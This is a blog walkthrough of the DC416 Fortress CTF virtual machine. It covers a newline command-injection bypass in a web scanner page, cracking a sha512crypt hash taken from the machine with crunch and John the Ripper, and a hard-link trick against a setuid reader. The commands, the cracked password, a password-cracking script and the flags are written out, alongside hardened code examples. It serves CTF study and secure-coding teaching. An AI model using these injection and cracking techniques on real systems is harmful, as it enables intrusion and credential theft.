30 March 2023

Pentesting Fun Stuff

following the cyber security path…

DC416 CTF CHALLENGES [FORTRESS]

Location

https://download.vulnhub.com/dc416-2016/dc416-fortress.ova

Introduction

This is one of four virtual machines that were created by members of the VulnHub CTF Team for DefCon Toronto’s first offline CTF.
This machine was created by superkojiman.
Each machine has a landing page on port 80 which describes the number of flags it has, along with any additional rules or hints.

Getting Started

First, an nmap scan of every TCP port (-p-) with version detection and the aggressive scripts (-sV -A).

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.3
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-10 09:56 CET
Nmap scan report for 192.168.171.3
Host is up (0.00049s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
| ssh-hostkey:
|   2048 3a:34:82:2b:86:e3:2a:e4:2c:34:18:85:f9:94:7c:69 (RSA)
|_  256 78:79:e2:ed:27:e3:43:77:0b:07:d2:03:bb:7f:c1:02 (ECDSA)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
|_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
|_http-title: Did not follow redirect to https://192.168.171.3/
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
|_http-title: fortress
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=ON/countryName=CA
| Not valid before: 2016-11-05T05:05:36
|_Not valid after:  2017-11-05T05:05:36
|_ssl-date: TLS randomness does not represent time
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.63 seconds

Looks like there are 3 open ports: SSH on 22 and Apache on 80 and 443, with port 80 redirecting to HTTPS (nmap notes the redirect it did not follow).
I try some banner grabbing before I start on the web server, but it gives nothing beyond the info I already got from the nmap scan.
Visiting the website on port 80 redirects me to port 443, where the rules of engagement are posted.

To enumerate directories I use dirsearch, which finds /scanner.php.

┌─[n13mant@planetmars]─[~/Desktop/dirsearch]
└──╼ $python3 dirsearch.py -u "https://192.168.171.3/" -e php -w /home/n13mant/Documents/dirsearch/db/dicc.txt -f -F -r -x 403,404 -t 10
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 9914
Error Log: /home/n13mant/Documents/dirsearch/logs/errors-17-01-10_13-26-57.log
Target: https://192.168.171.3/
[13:26:57] Starting:
[13:27:32] 200 -  561B  - /index.html
[13:27:45] 200 -  370B  - /scanner.php
Task Completed


This looks like an excellent vector for remote code execution (RCE).
To find out whether I can append arbitrary commands, I start adding shell metacharacters and watch the result. After I use the pipe character (|) I get a pat on the back for trying, much appreciated, LOL.

To see what is happening behind the scenes I use Burp Suite to capture the traffic, send the request to Repeater and try to execute code by getting past the filter. After some time I find that a simple line break does the trick: the filter catches the pipe, but a newline terminates the first command just as well, and whatever follows it runs as a second command.
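As an added example (not code from this write-up or from the VM), here is the filtering mistake that makes this bypass possible, modelled in Python: a blacklist that catches the pipe but not a newline, next to an allowlist check that never hands user input to a shell at all. The blacklist contents, the "Nice try." response and the use of echo in place of the real scanner are assumptions for illustration.

```python
"""Blacklist vs allowlist for a host parameter handed to a shell.

Added example, not the scanner.php from the Fortress VM: it models the
behaviour seen there, where a pipe is caught but a newline is not. The filter
rules and the use of `echo` in place of the real scanner are assumptions.
"""
import re
import subprocess

# A blacklist of the "obvious" shell metacharacters. Note what is missing:
# "\n" separates commands in sh exactly like ";" but is rarely filtered.
BLACKLIST = set("|;&`$<>()")

# Hostname or IPv4 literal only: the allowlist version of the same check.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}")


def blacklist_accepts(target: str) -> bool:
    """Return True if no blacklisted character is present (the weak check)."""
    return not (BLACKLIST & set(target))


def allowlist_accepts(target: str) -> bool:
    """Return True only if the whole string is a plausible hostname or IP."""
    return len(target) <= 253 and HOST_RE.fullmatch(target) is not None


def scan_unsafe(target: str) -> list[str]:
    """Vulnerable pattern: string concatenation into `sh -c`.

    `echo` stands in for the real port scanner so the example runs offline.
    """
    if not blacklist_accepts(target):
        return ["Nice try."]                  # assumed filter response
    out = subprocess.run(["sh", "-c", "echo scanning " + target],
                         capture_output=True, text=True, check=False)
    return out.stdout.splitlines()


def scan_safe(target: str) -> list[str]:
    """Hardened pattern: validate against an allowlist and never spawn a shell.

    The target is its own argv element, so no shell ever parses it.
    """
    if not allowlist_accepts(target):
        return ["Invalid host."]
    out = subprocess.run(["echo", "scanning", target],
                         capture_output=True, text=True, check=False)
    return out.stdout.splitlines()


if __name__ == "__main__":
    payload = "127.0.0.1\necho INJECTED"      # newline starts a second command
    print(scan_unsafe("127.0.0.1|id"))        # blocked by the blacklist
    print(scan_unsafe(payload))               # second command runs
    print(scan_safe(payload))                 # rejected before any exec
```

The blacklist passes the newline payload and sh happily runs the second command; the allowlist rejects it because a newline is not a hostname character, and even if validation were skipped, the argv form would pass the whole string to echo as one argument rather than to a shell.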

Next I run ls -aRl through the injection point to list the web root recursively.

drwxr-xr-x  4 root  wheel    512 Nov  9 20:24 .
drwxr-xr-x  6 root  wheel    512 Nov  9 19:58 ..
-rw-r--r--  1 root  wheel    561 Nov  8 23:51 index.html
drwxr-xr-x  2 root  wheel    512 Nov  9 20:22 k1ngd0m_k3yz
-rw-r--r--  1 root  wheel  44867 Nov  4 00:46 logo.png
drwxr-xr-x  2 root  wheel    512 Nov  9 20:22 s1kr3t
-rw-r--r--  1 root  wheel    759 Nov  5 00:50 scanner.php
-rw-r--r--  1 root  wheel    612 Nov  4 01:01 styles.css
./k1ngd0m_k3yz:
total 32
drwxr-xr-x  2 root  wheel  512 Nov  9 20:22 .
drwxr-xr-x  4 root  wheel  512 Nov  9 20:24 ..
-rw-r--r--  1 root  wheel  157 Nov  9 19:53 master
-rw-r--r--  1 root  wheel   47 Nov  9 19:54 passwd
./s1kr3t:
total 24
drwxr-xr-x  2 root  wheel  512 Nov  9 20:22 .
drwxr-xr-x  4 root  wheel  512 Nov  9 20:24 ..
-rw-r--r--  1 root  wheel   31 Nov  4 18:08 flag.txt
cat ./s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}
cat ./k1ngd0m_k3yz/master
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh
cat ./k1ngd0m_k3yz/passwd
craven:*:1002:1002:User &:/home/craven:/bin/sh

So I have the first flag plus the passwd and shadow entries for user "craven": on FreeBSD the hashes live in master.passwd, which is what the "master" file is a copy of, while passwd only carries the "*" placeholder.
First I'm going to locate the remaining flags.

find / -name "flag*"
/usr/local/www/apache24/data/s1kr3t/flag.txt
/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt
ls -lah /usr/home/vulnhub
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  1 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader
ls -lah /usr/home/craven
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
-rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
-r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt

The flags themselves I can't read yet (mode 0400 and owned by craven and vulnhub, not by the user the web server runs as), but there are some files I can.

cat /usr/home/craven/hint.txt
Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.
cat /usr/home/craven/reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha

So… the name of the pet is probably "qwerty". That leaves me to build a wordlist with crunch. In a crunch -t pattern, % stands for a digit, ^ for a symbol, and any other character is kept literally, so %%%qwerty^ expands to every three-digit prefix followed by the pet's name and one symbol: 10^3 × 33 symbols = 33000 candidates, which matches the count crunch reports.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $crunch 10 10 -t %%%qwerty^ -o craven.lst
Crunch will now generate the following amount of data: 363000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 33000
crunch: 100% completed generating output

Now to load this into John the Ripper. I saved the two files from the web root locally as ./etc/passwd and ./etc/shadow, so unshadow can merge the hash back into the passwd line john expects.

┌─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $unshadow ./etc/passwd ./etc/shadow > mypasswd
┌─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $john mypasswd --wordlist=craven.lst
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
931qwerty?       (craven)
1g 0:00:00:57 DONE (2017-01-10 14:46) 0.01740g/s 535.9p/s 535.9c/s 535.9C/s 930qwerty?..932qwerty>
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[✗]─[n13mant@planetmars]─[~/Desktop/john]
└──╼ $john --show mypasswd
craven:931qwerty?:1002:1002:User &:/home/craven:/bin/sh
1 password hash cracked, 0 left
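To show what crunch and john did here end to end, the following added example (not part of the original write-up, nor code from crunch or John the Ripper) regenerates the same 33000 candidates in Python and checks them against the hash copied from k1ngd0m_k3yz/master with a from-scratch implementation of the $6$ sha512crypt scheme used by FreeBSD's crypt(3). The symbol set is crunch's default for ^ (33 symbols, space included); everything else comes from the page.

```python
"""Rebuild the crunch wordlist from the hint and verify the cracked hash.

Added example, not part of the original write-up and not code from crunch or
John the Ripper: the candidate generator mirrors `crunch 10 10 -t %%%qwerty^`
and sha512_crypt() is a from-scratch implementation of the $6$ scheme
(Drepper's algorithm, as used by glibc and FreeBSD crypt(3)).
"""
import hashlib
import itertools
from typing import Iterable, Iterator, Optional

# The 33 symbols crunch substitutes for "^" by default (space included), which
# is why crunch reported 1000 * 33 = 33000 lines and 33000 * 11 = 363000 bytes.
CRUNCH_SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "

# Hash copied from the "master" file pulled through scanner.php.
CRAVEN_HASH = ("$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v."
               "gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.")

B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Output byte order used by crypt(3) for $6$: 21 triplets, then the last byte.
_ORDER = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
          (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
          (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
          (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
          (62, 20, 41)]


def candidates(pet: str = "qwerty") -> Iterator[str]:
    """Yield every 'DDD<pet><symbol>' string, rightmost position fastest."""
    for digits in itertools.product("0123456789", repeat=3):
        for sym in CRUNCH_SYMBOLS:
            yield "".join(digits) + pet + sym


def sha512_crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """Return the $6$ crypt string for password/salt."""
    sha = hashlib.sha512
    plen, slen = len(password), len(salt)
    b = sha(password + salt + password).digest()
    a = sha(password + salt)
    a.update(b * (plen // 64) + b[:plen % 64])
    n = plen
    while n > 0:                       # one block per bit of the key length
        a.update(b if n & 1 else password)
        n >>= 1
    a = a.digest()
    dp = sha(password * plen).digest()
    p = dp * (plen // 64) + dp[:plen % 64]
    ds = sha(salt * (16 + a[0])).digest()
    s = ds * (slen // 64) + ds[:slen % 64]
    c = a
    for i in range(rounds):            # the expensive part: 5000 rounds
        h = sha(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    out = []
    for i2, i1, i0 in _ORDER:
        w = (c[i2] << 16) | (c[i1] << 8) | c[i0]
        for _ in range(4):
            out.append(B64[w & 0x3F])
            w >>= 6
    out.append(B64[c[63] & 0x3F])
    out.append(B64[(c[63] >> 6) & 0x3F])
    prefix = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return prefix + salt.decode() + "$" + "".join(out)


def crack(crypt_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate matching a default-rounds $6$ hash, else None."""
    _, _, salt, _ = crypt_hash.split("$")      # ['', '6', salt, digest]
    for word in wordlist:
        if sha512_crypt(word.encode(), salt.encode()) == crypt_hash:
            return word
    return None


if __name__ == "__main__":
    words = list(candidates())
    print(len(words), "candidates")           # same count crunch reported
    print(crack(CRAVEN_HASH, ["000qwerty!", "931qwerty?"]))
```

Pure Python gets through the 5000 rounds at a few hundred candidates per second, so the full list takes minutes where john needed 57 seconds above; the point is that a $6$ hash can be verified offline with nothing but hashlib, and that the hint shrank the keyspace from "any 10-character string" to 33000 guesses.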

Now that I have the password, it's time to SSH in as "craven".

┌─[n13mant@planetmars]─[~]
└──╼ $ssh craven@192.168.171.3 -p 22
The authenticity of host '192.168.171.3 (192.168.171.3)' can't be established.
ECDSA key fingerprint is SHA256:ekOYTIfPK3fRGCYD3FHMkmfiN13ShRbk7a7gF0CIQd8.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/n13mant/.ssh/known_hosts).
Password for craven@fortress:
Last login: Tue Nov  8 19:52:08 2016 from 192.168.208.1
FreeBSD 11.0-RELEASE-p1 (GENERIC) #0 r306420: Thu Sep 29 01:43:23 UTC 2016
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier
Edit /etc/motd to change this login announcement.
Any user that is a member of the wheel group can use "su -" to simulate
a root login. You can add a user to the wheel group by editing /etc/group.
    -- Konstantinos Konstantinidis <kkonstan@duth.gr>

First I grab my second flag.

$ pwd
/usr/home/craven
$ ls -lah
total 60
drwxr-xr-x  2 craven  craven   512B Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512B Nov  5 01:59 ..
-rw-r--r--  1 craven  craven   1.0K Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5B Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60B Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254B Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163B Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379B Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336B Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802B Nov  5 01:59 .profile
-rw-------  1 craven  craven   281B Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978B Nov  5 01:59 .shrc
-r--------  1 craven  craven    46B Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119B Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77B Nov  5 02:20 reminders.txt
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Next stop is user "vulnhub" and his flag, which sits next to a setuid binary called reader.

$ cd vulnhub
$ ls -lah
total 56
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  1 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader
$ file reader
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped
$ ltrace reader
-sh: ltrace: not found
$ strings reader
/libexec/ld-elf.so.1
FreeBSD
FreeBSD
_Jv_RegisterClasses
libc.so.7
__progname
environ
printf
lstat
fopen
puts
strstr
sleep
_init_tls
fclose
memset
fgets
atexit
_end
FBSD_1.0
AWAVAUATSPI
ffff.
u*UH
fff.
%s [file to read]
Checking file type...
Symbolic links not allowed!
Checking if flag file...
flag
Nope. Can't let you have the flag.
Great! Printing file contents...
Win, here's your flag:

Now I run the program.

$ ./reader
./reader [file to read]
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.

Let's test the checks with files I control.

$ echo "testing" > /tmp/test.txt
$ ./reader /tmp/test.txt
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
testing
$ echo 'not the real flag' > /tmp/flag.txt
$ ./reader /tmp/flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.

So it checks two things about the path it is given: lstat to reject symbolic links (hence "Symbolic links not allowed!"), and a substring match for "flag" in the name (the strstr in the strings output). Anything that passes is opened and printed, and because the binary is setuid vulnhub, it can open vulnhub's 0400 flag.txt.
To bypass the name check I create a hard link to the real flag.txt under a different name. A symlink would be caught by the lstat check, but a hard link is just a second directory entry for the same inode: lstat reports a regular file, the new name contains no "flag", and fopen gets the real contents. This needs /tmp and /usr/home on the same filesystem, which they are here, and it relies on FreeBSD allowing a user to hard-link a file they don't own (the default); a Linux box with fs.protected_hardlinks=1 would refuse the ln.

$ ln /usr/home/vulnhub/flag.txt /tmp/needo
$ ./reader /tmp/needo
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}

And there is the final flag.
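Why the hard link works, and what a safer check looks like, as an added example in Python (not the reader binary, whose source is not on the page): it re-creates the two checks implied by the binary's strings and messages, lstat for symlinks and a substring match for "flag", runs them against a direct path, a symlink and a hard link in a temporary directory, and contrasts them with a check on the opened descriptor's (st_dev, st_ino). The file contents and names are constructed, and that the binary matches on the base name rather than the whole path is an assumption.

```python
"""Why a path-based 'no symlinks, no "flag" in the name' check fails.

Added example, not the Fortress `reader` binary: it re-creates the checks
implied by that binary's strings (lstat for symlinks, strstr for "flag"),
shows a hard link slipping past both, and shows a check on the opened file's
identity that catches it. Matching on the base name is an assumption.
"""
import os
import stat
import tempfile


def _identity(path: str) -> tuple:
    """(st_dev, st_ino) of the file a check is trying to protect."""
    st = os.stat(path)
    return (st.st_dev, st.st_ino)


def reader_check(path: str) -> str:
    """Mimic the binary: reject symlinks and names containing 'flag'."""
    st = os.lstat(path)                       # lstat: does not follow links
    if stat.S_ISLNK(st.st_mode):
        return "Symbolic links not allowed!"
    if "flag" in os.path.basename(path):      # strstr on the user's string
        return "Nope. Can't let you have the flag."
    with open(path, "rb") as f:               # fopen by name
        return f.read().decode()


def hardened_read(path: str, protected: str) -> str:
    """Open first, then decide on the opened file, not on its name.

    O_NOFOLLOW refuses a symlink at the final component, and comparing the
    open descriptor's (st_dev, st_ino) with the protected file catches hard
    links and renames alike, with no check-then-open window.
    """
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)
        if (st.st_dev, st.st_ino) == _identity(protected):
            return "Nope. Can't let you have the flag."
        return os.read(fd, 4096).decode()
    finally:
        os.close(fd)


def demo() -> dict:
    """Build flag.txt, a symlink and a hard link to it; return each outcome."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        flag = os.path.join(d, "flag.txt")
        with open(flag, "w") as f:
            f.write("FLAG{constructed_for_the_example}")   # constructed value
        link = os.path.join(d, "needo_sym")
        hard = os.path.join(d, "needo")
        os.symlink(flag, link)
        os.link(flag, hard)                   # same inode, different name
        results["direct"] = reader_check(flag)
        results["symlink"] = reader_check(link)
        results["hardlink"] = reader_check(hard)
        try:
            results["hardened_symlink"] = hardened_read(link, flag)
        except OSError as e:                  # ELOOP from O_NOFOLLOW
            results["hardened_symlink"] = type(e).__name__
        results["hardened_hardlink"] = hardened_read(hard, flag)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:18} {outcome}")
```

Checking the descriptor you actually opened removes the gap between the check and the fopen, and comparing identity rather than name catches hard links and renames. For a setuid reader the complete fix is to compare the opened file's owner with the real uid, or to drop privileges before opening, rather than to enumerate forbidden names.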
